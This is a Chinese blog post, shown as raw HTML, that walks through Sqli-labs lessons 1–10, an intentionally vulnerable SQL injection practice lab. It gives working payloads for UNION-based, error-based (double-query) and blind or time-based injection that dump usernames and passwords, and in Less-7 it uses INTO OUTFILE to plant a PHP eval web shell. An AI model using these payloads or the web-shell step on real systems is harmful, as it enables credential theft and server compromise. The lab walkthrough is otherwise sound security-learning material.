<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="Less-1先用or 1&#x3D;1，只显示一条结果，应该有limit语句…… 1?id&#x3D;1&#39; order by 3--+  判断列数以便使用联合查询，发现有三列。 1?id&#x3D;&#39; union select 1,database(),3--+   正常回显，当前库是security。 查表： 1?id&#x3D;&#39; union select 1,(select g">
<meta property="og:type" content="article">
<meta property="og:title" content="Sqli-labs">
<meta property="og:url" content="http://example.com/2021/01/25/Sqli-labs/index.html">
<meta property="og:site_name" content="inanb">
<meta property="og:description" content="Less-1先用or 1&#x3D;1，只显示一条结果，应该有limit语句…… 1?id&#x3D;1&#39; order by 3--+  判断列数以便使用联合查询，发现有三列。 1?id&#x3D;&#39; union select 1,database(),3--+   正常回显，当前库是security。 查表： 1?id&#x3D;&#39; union select 1,(select g">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210125092719056.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210125094000614.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210125094309642.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210125094559177.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210125100314265.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210125100534807.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210125101316132.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210125102444211.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210125102858654.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210125103101029.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126103939343.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126114614150.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126170317765.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126170944295.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126172631743.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126181005116.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126181512238.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126224148354.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126230104531.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126225640997.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126103939343.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126232436182.png">
<meta property="og:image" content="http://example.com/images/Sqli-labs/image-20210126233825832.png">
<meta property="article:published_time" content="2021-01-25T01:14:28.000Z">
<meta property="article:modified_time" content="2021-03-06T09:19:02.775Z">
<meta property="article:author" content="inanb">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/Sqli-labs/image-20210125092719056.png">

<link rel="canonical" href="http://example.com/2021/01/25/Sqli-labs/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Sqli-labs | inanb</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">inanb</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">昨夜雨疏风骤 浓睡不消残酒</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/01/25/Sqli-labs/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/header.jpg">
      <meta itemprop="name" content="inanb">
      <meta itemprop="description" content="铁马冰河入梦来">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="inanb">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Sqli-labs
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-01-25 09:14:28" itemprop="dateCreated datePublished" datetime="2021-01-25T09:14:28+08:00">2021-01-25</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-03-06 17:19:02" itemprop="dateModified" datetime="2021-03-06T17:19:02+08:00">2021-03-06</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h4 id="Less-1"><a href="#Less-1" class="headerlink" title="Less-1"></a>Less-1</h4><p>先用or 1=1，只显示一条结果，应该有limit语句……</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;1&#39; order by 3--+</span><br></pre></td></tr></table></figure>

<p>判断列数以便使用联合查询，发现有三列。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;&#39; union select 1,database(),3--+</span><br></pre></td></tr></table></figure>

<p><img src="/images/Sqli-labs/image-20210125092719056.png" alt="image-20210125092719056"></p>
<p>正常回显，当前库是security。</p>
<p>查表：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;&#39; union select 1,(select group_concat(table_name) from information_schema.tables where table_schema&#x3D;&#39;security&#39;),3--+</span><br></pre></td></tr></table></figure>

<p><img src="/images/Sqli-labs/image-20210125094000614.png" alt="image-20210125094000614"></p>
<p>查字段：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;&#39; union select 1,(select group_concat(column_name) from information_schema.columns where table_name&#x3D;&#39;users&#39;),3--+</span><br></pre></td></tr></table></figure>



<p><img src="/images/Sqli-labs/image-20210125094309642.png" alt="image-20210125094309642"></p>
<p>可以查询用户名与密码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;&#39; union select 1,(select group_concat(username,&quot;-&quot;,password) from security.users),3--+</span><br></pre></td></tr></table></figure>

<p><img src="/images/Sqli-labs/image-20210125094559177.png" alt="image-20210125094559177"></p>
<p>Less-1结束……</p>
<h4 id="Less-2"><a href="#Less-2" class="headerlink" title="Less-2"></a>Less-2</h4><p>?id=1 and 1=2 无回显，数值型注入……</p>
<p>order by 3 即有三列。</p>
<p>用的好像还是security库……</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;0 union select 1,(select group_concat(username,&quot;-&quot;,password) from security.users),3--+</span><br></pre></td></tr></table></figure>

<p><img src="/images/Sqli-labs/image-20210125100314265.png" alt="image-20210125100314265"></p>
<p>em，和Less-1差不多……</p>
<h4 id="Less-3"><a href="#Less-3" class="headerlink" title="Less-3"></a>Less-3</h4><p>?id=1’回显有点奇怪……</p>
<p><img src="/images/Sqli-labs/image-20210125100534807.png" alt="image-20210125100534807"></p>
<p>那一部分应该是：**’1”) LIMIT 0,1**，应该是id=(‘$id’) </p>
<p>?id=1’)–+   回显正常</p>
<p>?id=1’) order by 3–+ 有3列</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;&#39;) union select 1,(select group_concat(username,&quot;-&quot;,password) from security.users),3--+</span><br></pre></td></tr></table></figure>

<p><img src="/images/Sqli-labs/image-20210125101316132.png" alt="image-20210125101316132"></p>
<p>OK</p>
<h4 id="Less-4"><a href="#Less-4" class="headerlink" title="Less-4"></a>Less-4</h4><p>?id=1’’’’’’’’’’’’’’’’’’–+123156hbhj–+</p>
<p>没有任何的报错……应该是都被认为是字符了</p>
<p>?id=1” 报错：</p>
<p><img src="/images/Sqli-labs/image-20210125102444211.png" alt="image-20210125102444211"></p>
<p>这里大概是：id=(“$id”)</p>
<p>?id=1”)–+  回显正常</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;&quot;) union select 1,(select group_concat(username,&quot;-&quot;,password) from security.users),3--+</span><br></pre></td></tr></table></figure>

<p>这样就可以了……</p>
<h4 id="Less-5"><a href="#Less-5" class="headerlink" title="Less-5"></a>Less-5</h4><p><img src="/images/Sqli-labs/image-20210125102858654.png" alt="image-20210125102858654"></p>
<p>emm……不太懂，查一波。</p>
<p>这波大概是盲注，盲注也有很多种……</p>
<p><img src="/images/Sqli-labs/image-20210125103101029.png" alt="image-20210125103101029"></p>
<p><img src="/images/Sqli-labs/image-20210126103939343.png" alt="image-20210126103939343"></p>
<p>?id=1’ and left(database(),1)=’s’–+  //一位一位判断库名</p>
<p>?id=1’ and if(length(database())=8,sleep(1),1)–+  //利用时间延迟判断猜测是否正确3</p>
<p>结合burpsuit可以更方便一些……</p>
<p>还有更强的方法：双查询联合注入</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/lixiangminghate/article/details/80466257">详细讲解双查询注入csdn</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/BloodZero/p/4660971.html">双查询注入（大佬）</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/e097a1c0d9ef">sql注入之双查询注入（简书）</a></p>
<p>这些文章都尽可能的解释了这个方法……</p>
<p><a target="_blank" rel="noopener" href="https://www.1keydata.com/cn/sql/sql-groupby.php">group by 的说明</a></p>
<p><img src="/images/Sqli-labs/image-20210126114614150.png" alt="image-20210126114614150"></p>
<p>理解一波，不知道对不对……</p>
<p>group by 读取时，查找字段名中是否有key，没有则插入。但是每次读取判断时，floor(random(0)*2)是随机的0或1……所以概率出现重复插入的情况，此时会发生报错，报错内容回显出database()的内容。</p>
<p>eg：*<strong>?id=’ union select count(*),count(*),concat(‘<del>‘,(select database()),’</del>‘,floor(rand()*2)) as a from information_schema.tables group by a–+*</strong></p>
<p><a target="_blank" rel="noopener" href="https://www.w3school.com.cn/sql/sql_func_count_ast.asp">那这个count(*)又有什么作用……</a></p>
<p>本以为是像select 1，2，3一样占行数的……但改成1和2又会不起效果……</p>
<p>必须有一个count(*)才行……</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/laoxiajiadeyun/p/10283251.html">这个看着差不多</a>，结合自己理解一波：</p>
<p><img src="/images/Sqli-labs/image-20210126170317765.png" alt="image-20210126170317765"></p>
<p><img src="/images/Sqli-labs/image-20210126170944295.png" alt="image-20210126170944295"></p>
<p>先以语句结果去寻找，找不到，插入语句重新计算得到的结果。这样的话，表至少有两列，这个方法才能成功（至少遍历两次才能产生冲突）。若第二次找不到，则插入新结果，此时还要计算对应的count，遍历数据。</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/aspirant/p/8983901.html">SQL有三个类型的索引，唯一索引 不能有重复，但聚集索引，非聚集索引可以有重复</a></p>
<p>主键key默认是唯一索引。count的再次遍历发现了主键索引的冲突，报错。大概是这样？……</p>
<p>还有，再查当前库时，可以用：**?id=-1’ union select n from n–+**</p>
<p><img src="/images/Sqli-labs/image-20210126172631743.png" alt="image-20210126172631743"></p>
<p>直接得到security……不过好像只能干这个……</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;&#39; union select 1,count(\*),concat(&#39;~&#39;,(select database()),&#39;~&#39;,floor(rand()*2)) as a from information_schema.tables group by a--+</span><br></pre></td></tr></table></figure>

<p>查当前库</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;-1&#39; union select count(\*),1, **concat(&#39;~&#39;,(select concat(table_name) from information_schema.tables where table_schema&#x3D;database() limit x,1)**,&#39;~&#39;,floor(rand()*2)) as a from information_schema.tables group by a--+</span><br></pre></td></tr></table></figure>

<p>修改x可以查各个表名</p>
<blockquote>
<p>?id=-1’ union select count(*),1, <strong>concat(‘~‘,(select column_name from information_schema.columns where table_name=’users’ limit x,1)</strong>,’~’,floor(rand()*2)) as a from information_schema.tables group by a–+</p>
</blockquote>
<p>修改x可以查各个列名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;-1&#39; union select count(*),1, concat(&#39;~&#39;,(select concat_ws(&#39;[&#39;,password,username) from users limit x,1),&#39;~&#39;,floor(rand()*2)) as a from information_schema.tables group by a--+</span><br></pre></td></tr></table></figure>

<p>修改x可以查各个字段</p>
<p>百分百成功(大概)：rand()里面的seed调为小于等于0，对于指定的seed，rand的值相同。但是是什么，为什么我都不知道……我也是试出来的，也查不清楚……</p>
<p>回来再试试~~</p>
<h4 id="Less-6"><a href="#Less-6" class="headerlink" title="Less-6"></a>Less-6</h4><p>?id=1” 报错</p>
<p><img src="/images/Sqli-labs/image-20210126181005116.png" alt="image-20210126181005116"></p>
<p>?id=1”–+成功</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;-1&quot; union select count(*),1, concat(&#39;~&#39;,(select concat(table_name) from information_schema.tables where table_schema&#x3D;database() limit x,1),&#39;~&#39;,floor(rand()*2)) as a from information_schema.tables group by a--+</span><br></pre></td></tr></table></figure>

<p>查表</p>
<p>差不多……</p>
<h4 id="Less-7"><a href="#Less-7" class="headerlink" title="Less-7"></a>Less-7</h4><p><img src="/images/Sqli-labs/image-20210126181512238.png" alt="image-20210126181512238"></p>
<p>outfile又不懂辽……</p>
<p>?id=1’–+ 只提示有错误……没有错误的回显了。查资料辽。</p>
<p>?id=1‘)) and (select count(*) from mysql.user)&gt;0 –+ </p>
<p>判断有没有文件写入权限，不过只显示有错误，不知道是不是语法错误……</p>
<p>?id=1’)) and if((select count(*) from mysql.user)&gt;0,1,1) –+ 进入，应该是没有写入/写出权限</p>
<p>关于file权限：</p>
<blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1 必须有权限读取并且文件必须完全可读 </span><br><span class="line">2 目的文件必须在服务器上 </span><br><span class="line">3 必须指定文件完整的路径 </span><br><span class="line">4 欲读取文件必须小于 max_allowed_packet</span><br></pre></td></tr></table></figure>
</blockquote>
<p>由于phpstudy的设置，所以在网站上操作没有权限，好像是secure_file_priv需要设置一下……</p>
<p>更改之后：?id=1’)) and if((select count(*) from mysql.user)&gt;0,1,0) –+ 成功进入</p>
<p>导出文件：?id=1’)) union select 1,database(),user() into outfile “D:\pp.txt”–+ 报错但文件成功导出。</p>
<p><img src="/images/Sqli-labs/image-20210126224148354.png" alt="image-20210126224148354"></p>
<p>*<em>?id=’)) union select * from users into outfile “D:\apap.txt”–+*</em></p>
<p><img src="/images/Sqli-labs/image-20210126230104531.png" alt="image-20210126230104531"></p>
<p>OK。</p>
<p>导入文件：</p>
<p>?id=1’)) union select 1,2,’&lt;?php @eval($_POST[“b”])?&gt;‘ into outfile “D:\phpstudy_pro\WWW\sqli-labs-master\Less-7\b.php”–+</p>
<blockquote>
<p>反斜杠“\”是Windows系统文件目录结构使用的分隔符，如：D:\我的文档。只有 windows 支持反斜杠路径符 \ ，而unix支持 /</p>
<p>但是我们还应该知道 \ 也是转义字符，在url中他会当成转义字符处理，所以我们用 \ 对反斜杠进行转义，那么结果就变成了一个反斜杠</p>
</blockquote>
<p><img src="/images/Sqli-labs/image-20210126225640997.png" alt="image-20210126225640997"></p>
<p>成功连接。</p>
<h4 id="Less-8"><a href="#Less-8" class="headerlink" title="Less-8"></a>Less-8</h4><p>这次彻底没有任何错误回显了……</p>
<p>只能一位一位注…同Less-5的第一种方法：</p>
<p>?id=1’ and left(database(),1)=’s’–+  //一位一位判断库名</p>
<p>?id=1’ and if(length(database())=8,sleep(1),1)–+  //利用时间延迟判断猜测是否正确</p>
<p>结合burpsuit可以更方便一些……不用bp也可以用二分法。</p>
<p><img src="/images/Sqli-labs/image-20210126103939343.png" alt="image-20210126103939343"></p>
<p>?id=1’ and if(left((select table_name from information_schema.tables where table_schema=database() limit x,1),1)=’r’ , sleep(1), 1) –+   //查表</p>
<p>?id=1’ and if(left((select column_name from information_schema.columns where table_name=’users’ limit x,1),1)=’a’, sleep(1), 1) –+   //查列</p>
<p>?id=1’ and if(left((select password from users limit 0,1),4)=’dumb’ , sleep(1), 1) –+    //查数据</p>
<h4 id="Less-9"><a href="#Less-9" class="headerlink" title="Less-9"></a>Less-9</h4><p><img src="/images/Sqli-labs/image-20210126232436182.png" alt="image-20210126232436182"></p>
<p>em，和Less-8是一样的。</p>
<h4 id="Less-10"><a href="#Less-10" class="headerlink" title="Less-10"></a>Less-10</h4><p>不论怎么打，都是“You are in”……</p>
<p>源代码：</p>
<p><img src="/images/Sqli-labs/image-20210126233825832.png" alt="image-20210126233825832"></p>
<p>$id的值左右拼接了“ ”；这样处理的话只能用and去判断</p>
<p>所以用双引号就行了……其他和Less-8是一样的。</p>
<p><strong>1-10:OK</strong></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/01/23/Systemlearning-1/" rel="prev" title="Systemlearning-1">
      <i class="fa fa-chevron-left"></i> Systemlearning-1
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/01/27/GXYCTF2019-BabySQli/" rel="next" title="GXYCTF2019-BabySQli">
      GXYCTF2019-BabySQli <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-1"><span class="nav-number">1.</span> <span class="nav-text">Less-1</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-2"><span class="nav-number">2.</span> <span class="nav-text">Less-2</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-3"><span class="nav-number">3.</span> <span class="nav-text">Less-3</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-4"><span class="nav-number">4.</span> <span class="nav-text">Less-4</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-5"><span class="nav-number">5.</span> <span class="nav-text">Less-5</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-6"><span class="nav-number">6.</span> <span class="nav-text">Less-6</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-7"><span class="nav-number">7.</span> <span class="nav-text">Less-7</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-8"><span class="nav-number">8.</span> <span class="nav-text">Less-8</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-9"><span class="nav-number">9.</span> <span class="nav-text">Less-9</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-10"><span class="nav-number">10.</span> <span class="nav-text">Less-10</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="inanb"
      src="/images/header.jpg">
  <p class="site-author-name" itemprop="name">inanb</p>
  <div class="site-description" itemprop="description">铁马冰河入梦来</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">61</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">inanb</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

</body>
</html>
